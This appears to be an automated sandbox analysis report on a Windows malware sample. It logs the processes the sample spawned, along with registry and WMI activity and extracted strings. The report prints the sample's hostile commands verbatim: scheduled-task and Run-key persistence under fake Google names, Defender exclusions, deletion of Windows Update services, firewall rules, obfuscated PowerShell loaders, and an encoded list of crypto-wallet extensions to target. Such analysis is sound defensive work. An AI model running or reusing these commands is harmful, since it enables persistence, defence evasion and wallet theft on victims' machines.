Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Google\chrome.exe "C:\Users\user\AppData\Local\Google\chrome.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Google\ofg.exe C:\Users\user\AppData\Local\Google\ofg.exe
Source: C:\Users\user\AppData\Local\Google\ofg.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\ofg.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\cmd.exe cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\cmd.exe cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -enC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAnAEMAOgBcAFUAcwBlAHIAcwBcAFIAZQB2AGUAbABpAG4AJwAsACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACcAKQAgAC0ARgBvAHIAYwBlAA==
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -enC UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AUwB1AGIAbQBpAHQAUwBhAG0AcABsAGUAcwBDAG8AbgBzAGUAbgB0ACAAMgA=
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\chrome.exe" /TN "GoogleUpdateTask{56c41dbe-92cb-4ab7-b423-bd40cb65f9fe}" /SC ONLOGON /F /RL HIGHEST
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\chrome.exe" /TN "GoogleUpdateTaskUAC{0625ad4f-50a5-4d12-b200-288d853de0d5}" /SC HOURLY /F /MO 1 /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Google\chrome.exe C:\Users\user\AppData\Local\Google\chrome.exe
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\GoogleUpdate.exe C:\Windows\GoogleUpdate.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Temp\fl.exe "C:\Users\user\AppData\Local\Temp\fl.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Source: C:\Windows\GoogleUpdate.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Windows\GoogleUpdate.exe" "Google Updater" ENABLE ALL
Source: C:\Windows\GoogleUpdate.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="Google Updater" dir=in action=allow program="C:\Windows\GoogleUpdate.exe" enable=yes
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Windows\GoogleUpdate.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="Google Updater" dir=out action=allow program="C:\Windows\GoogleUpdate.exe" enable=yes
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Google\chrome.exe C:\Users\user\AppData\Local\Google\chrome.exe
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{7a77888d-cd31-4f67-91ce-46090c964f53}
Source: unknown	Process created: C:\Program Files\Google\Chrome\updater.exe C:\Program Files\Google\Chrome\updater.exe
Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Google\brave.exe "C:\Users\user\AppData\Local\Google\brave.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Google\ofg.exe "C:\Users\user\AppData\Local\Google\ofg.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Google\chrome.exe "C:\Users\user\AppData\Local\Google\chrome.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process created: C:\Users\user\AppData\Local\Temp\fl.exe "C:\Users\user\AppData\Local\Temp\fl.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\cmd.exe cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\cmd.exe cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\brave.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\ofg.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\ofg.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -enC QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAnAEMAOgBcAFUAcwBlAHIAcwBcAFIAZQB2AGUAbABpAG4AJwAsACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzACcAKQAgAC0ARgBvAHIAYwBlAA==	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -enC UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AUwB1AGIAbQBpAHQAUwBhAG0AcABsAGUAcwBDAG8AbgBzAGUAbgB0ACAAMgA=	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\chrome.exe" /TN "GoogleUpdateTask{56c41dbe-92cb-4ab7-b423-bd40cb65f9fe}" /SC ONLOGON /F /RL HIGHEST	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\chrome.exe" /TN "GoogleUpdateTaskUAC{0625ad4f-50a5-4d12-b200-288d853de0d5}" /SC HOURLY /F /MO 1 /RL HIGHEST	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\chrome.exe	Process created: C:\Windows\GoogleUpdate.exe C:\Windows\GoogleUpdate.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Google\ofg.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /TR "C:\Users\user\AppData\Local\Google\ofg.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\GoogleUpdate.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Windows\GoogleUpdate.exe" "Google Updater" ENABLE ALL
Source: C:\Windows\GoogleUpdate.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="Google Updater" dir=in action=allow program="C:\Windows\GoogleUpdate.exe" enable=yes
Source: C:\Windows\GoogleUpdate.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="Google Updater" dir=out action=allow program="C:\Windows\GoogleUpdate.exe" enable=yes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\hZDPlQwZ9D.exe

Code function: 0_2_0040FCE0 RegCreateKeyA,RegSetValueA,GetUserNameA,RegCloseKey,RegOpenKeyExA,AdjustTokenPrivileges,LookupPrivilegeValueA,OpenProcessToken,RegQueryValueExA,RegDeleteKeyA,

0_2_0040FCE0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

File created: C:\Users\user\AppData\Local\Temp\filename.exe

Jump to behavior

Source: fl.exe, 0000002B.00000000.421234279.00000000004EF000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: fl.exe, 0000002B.00000000.421234279.00000000004EF000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: 0.3.hZDPlQwZ9D.exe.700000.0.unpack, BrEx.cs

Base64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2Z